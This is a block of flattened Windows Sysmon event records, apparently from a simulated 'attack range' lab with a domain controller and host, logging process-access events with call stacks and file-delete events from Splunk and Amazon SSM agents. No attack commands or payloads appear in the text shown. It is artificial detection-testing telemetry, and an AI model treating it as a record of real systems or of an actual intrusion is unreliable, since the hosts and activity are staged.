12:22:46.527{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002704C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+f4cc|C:\Windows\System32\NPSMDesktopProvider.dll+f406|C:\Windows\System32\NPSMDesktopProvider.dll+6939|C:\Windows\System32\NPSMDesktopProvider.dll+2ba0|C:\Windows\System32\NPSMDesktopProvider.dll+272a|C:\Windows\System32\NPSMDesktopProvider.dll+2849|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.392{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A37A68FA67197CFFD5F177C430FEBFE7,SHA256=2D8D1C4CA7A48C4D90FB747535785B55C9726F6C5B0BC949B7D0EC88851C2A6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.365{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.365{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.365{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.365{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.365{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.365{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000042949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.160{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96084DEE446474873BBDFF54341F3F20,SHA256=82EA02D4BC367082D2EAE6331F8FB591CF2AB43FDA3E891CE66278DD8A4300D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042968Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:47.679{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-043MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042967Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:47.240{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D459242894F4D9481BD521412AD19D5,SHA256=64CBBDF2AE6402AF293937B12D7B3B03B02E278D16B53F1A7BC588E54E4D0BE7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016732Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:47.058{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDA98F69B0BA0F7BC34C1296BF2AC181,SHA256=5A38DB53D4147BE60F9541037BB00F1B92E78ADF74C914C34D0D88BB01CA1FF9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042992Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.995{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7b35a|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284|C:\Windows\System32\Windows.UI.Xaml.dll+6116f|C:\Windows\System32\Windows.UI.Xaml.dll+60f87|C:\Windows\System32\Windows.UI.Xaml.dll+60a74|C:\Windows\System32\Windows.UI.Xaml.dll+5ff39 10341000x800000000000000042991Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.995{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7b2c4|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284|C:\Windows\System32\Windows.UI.Xaml.dll+6116f|C:\Windows\System32\Windows.UI.Xaml.dll+60f87|C:\Windows\System32\Windows.UI.Xaml.dll+60a74|C:\Windows\System32\Windows.UI.Xaml.dll+5ff39 10341000x800000000000000042990Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.995{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+7b2a6|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284 10341000x800000000000000042989Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.995{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+7b2a6|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284|C:\Windows\System32\Windows.UI.Xaml.dll+6116f 10341000x800000000000000042988Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042987Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7b35a|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284|C:\Windows\System32\Windows.UI.Xaml.dll+6116f|C:\Windows\System32\Windows.UI.Xaml.dll+60f87|C:\Windows\System32\Windows.UI.Xaml.dll+60a74|C:\Windows\System32\Windows.UI.Xaml.dll+5ff39 10341000x800000000000000042986Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7b2c4|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284|C:\Windows\System32\Windows.UI.Xaml.dll+6116f|C:\Windows\System32\Windows.UI.Xaml.dll+60f87|C:\Windows\System32\Windows.UI.Xaml.dll+60a74|C:\Windows\System32\Windows.UI.Xaml.dll+5ff39 10341000x800000000000000042985Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+7b2a6|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284 10341000x800000000000000042984Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+7b2a6|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284|C:\Windows\System32\Windows.UI.Xaml.dll+6116f 10341000x800000000000000042983Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042982Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7b35a|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284|C:\Windows\System32\Windows.UI.Xaml.dll+6116f|C:\Windows\System32\Windows.UI.Xaml.dll+60f87|C:\Windows\System32\Windows.UI.Xaml.dll+60a74|C:\Windows\System32\Windows.UI.Xaml.dll+5ff39 10341000x800000000000000042981Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7b2c4|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284|C:\Windows\System32\Windows.UI.Xaml.dll+6116f|C:\Windows\System32\Windows.UI.Xaml.dll+60f87|C:\Windows\System32\Windows.UI.Xaml.dll+60a74|C:\Windows\System32\Windows.UI.Xaml.dll+5ff39 10341000x800000000000000042980Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 